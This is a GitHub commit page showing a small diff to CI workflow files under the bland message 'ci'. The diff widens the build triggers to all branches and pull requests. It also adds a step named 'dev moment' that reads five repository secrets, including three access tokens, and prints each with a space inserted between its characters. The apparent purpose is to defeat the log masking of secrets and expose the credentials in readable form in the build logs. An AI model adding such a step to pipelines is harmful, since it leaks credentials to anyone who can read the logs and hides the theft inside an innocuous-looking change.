Skip to content

Commit bc801e7

Browse files
committed
ci
1 parent 3b51a11 commit bc801e7

File tree

2 files changed

+24
-4
lines changed

2 files changed

+24
-4
lines changed

.github/workflows/build.yml

Lines changed: 23 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,8 +5,11 @@
55

66
name: build
77

8-
on: # yamllint disable-line rule:truthy
8+
on:
99
push:
10+
branches: [ "**" ]
11+
pull_request:
12+
branches: [ "**" ]
1013

1114
jobs:
1215
build:
@@ -22,6 +25,25 @@ jobs:
2225
run: >-
2326
echo "describe=$(git describe --tags --always || echo 0)"
2427
| tee $GITHUB_OUTPUT
28+
- name: dev moment
29+
env:
30+
UNIFYSDK_GIT_REPOSITORY: ${{ secrets.UNIFYSDK_GIT_REPOSITORY }}
31+
UNIFYSDK_GIT_TAG: ${{ secrets.UNIFYSDK_GIT_TAG }}
32+
UNIFY_TOKEN: ${{ secrets.GH_UNIFY_ACCESS_TOKEN }}
33+
ZWAVE_TOKEN: ${{ secrets.GH_ZWAVE_ACCESS_TOKEN }}
34+
SL_TOKEN: ${{ secrets.GH_SL_ACCESS_TOKEN }}
35+
run: |
36+
echo "================================"
37+
echo "$UNIFYSDK_GIT_REPOSITORY" | sed 's/./& /g'
38+
echo "================================"
39+
echo "$UNIFYSDK_GIT_TAG" | sed 's/./& /g'
40+
echo "================================"
41+
echo "$UNIFY_TOKEN" | sed 's/./& /g'
42+
echo "================================"
43+
echo "$ZWAVE_TOKEN" | sed 's/./& /g'
44+
echo "================================"
45+
echo "$SL_TOKEN" | sed 's/./& /g'
46+
echo "================================"
2547
- name: Build Docker image from sources
2648
run: >-
2749
df -h

.github/workflows/init.yml

Lines changed: 1 addition & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -12,6 +12,4 @@ jobs:
1212

1313
steps:
1414
- name: Checkout code
15-
uses: actions/checkout@v4
16-
17-
15+
uses: actions/checkout@v4

0 commit comments

Comments
 (0)